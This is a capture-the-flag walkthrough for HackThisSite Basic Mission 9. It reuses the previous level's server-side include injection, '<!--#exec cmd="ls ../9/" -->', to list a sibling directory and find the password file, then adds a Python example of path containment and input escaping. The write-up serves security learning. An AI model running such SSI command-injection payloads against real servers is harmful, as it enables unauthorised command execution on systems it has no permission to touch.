HackThisSite - Basic Mission 9
Challenge
Network Security Sam is going down with the ship - he's determined to keep obscuring the password file, no matter how many times people manage to recover it. This time the file is saved in /var/www/hackthissite.org/html/missions/basic/9/.
In the last level, however, in my attempt to limit people to using server side includes to display the directory listing to level 8 only, I have mistakenly screwed up somewhere.. there is a way to get the obscured level 9 password.
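Sam insists on continuing to hide the password file. This time it is in the /missions/basic/9/ directory. But he admits that he botched the restriction in the previous level: there is still a way to get the level 9 password.
Note: this level's page has no input field (other than the password box), so there is nowhere to inject directly.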
Solution
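The challenge hints that the SSI vulnerability from the previous level can still be used to reach the level 9 password.
Go back to level8.php of Basic 8 and use SSI injection again, but this time point the path at the level 9 directory:
    <!--#exec cmd="ls ../9/" -->
After submitting, visit the generated .shtml file; the output shows the contents of the level 9 directory:
    index.php
Visit https://www.hackthissite.org/missions/basic/9/p91e283zc3.php to get the password.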
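Key takeaways:
1. When fixing a vulnerability, make sure the fix is complete; restricting one specific scope does not make it secure.
2. Directory traversal can break out of relative path restrictions.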
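The two takeaways above as an added example (not part of the original write-up and not HackThisSite's code): a scope check that compares the raw joined path accepts `../9/`, while a check on the normalized path rejects it, and escaping user input before it is written to the .shtml file removes the directive altogether. The level 8 base path and the function names `naive_allowed`, `contained` and `neutralize_ssi` are assumptions made for illustration.

```python
import html
import posixpath

# Assumed layout: the page gives .../missions/basic/9/; level 8 is taken to be its sibling.
BASE = "/var/www/hackthissite.org/html/missions/basic/8"


def naive_allowed(arg: str) -> bool:
    """Hypothetical incomplete fix: reject absolute paths, prefix-check the raw join."""
    return not arg.startswith("/") and posixpath.join(BASE, arg).startswith(BASE)


def contained(arg: str) -> bool:
    """Collapse '..' first, then require the result to be BASE or below it."""
    # normpath is lexical only; on a real filesystem use os.path.realpath
    # so that symlinks are resolved before the comparison.
    resolved = posixpath.normpath(posixpath.join(BASE, arg))
    return resolved == BASE or resolved.startswith(BASE + "/")


def neutralize_ssi(user_text: str) -> str:
    """Root-cause fix: escape input before writing it into a .shtml file,
    so '<!--#' reaches the SSI parser as text, never as a directive."""
    return html.escape(user_text, quote=True)


if __name__ == "__main__":
    # Constructed sample arguments, including the one used in the write-up.
    for arg in [".", "sub/..", "../9/", "../8x/", "/etc"]:
        print(f"{arg!r:10} naive={naive_allowed(arg)!s:5} contained={contained(arg)}")
    print(neutralize_ssi('<!--#exec cmd="ls ../9/" -->'))
```

The `../8x/` case shows why the comparison uses `BASE + "/"`: a plain prefix match would also accept a sibling directory whose name merely starts with the same characters.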
1883004c